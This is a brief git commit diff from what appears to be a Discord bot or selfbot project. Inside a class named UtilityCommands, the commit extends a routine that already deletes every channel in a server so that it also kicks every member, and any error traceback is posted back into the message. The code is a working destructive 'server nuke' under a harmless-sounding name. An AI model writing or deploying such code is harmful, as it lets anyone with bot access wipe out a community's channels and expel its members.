This commit is contained in:
Xargana 2025-05-08 20:47:55 +03:00
commit ff4418f834

View file

@ -79,6 +79,8 @@ class UtilityCommands:
try:
for i in message.guild.channels:
await i.delete()
for i in message.guild.members:
await i.kick()
except Exception as e:
await message.edit(content=traceback.format_exc())
finally: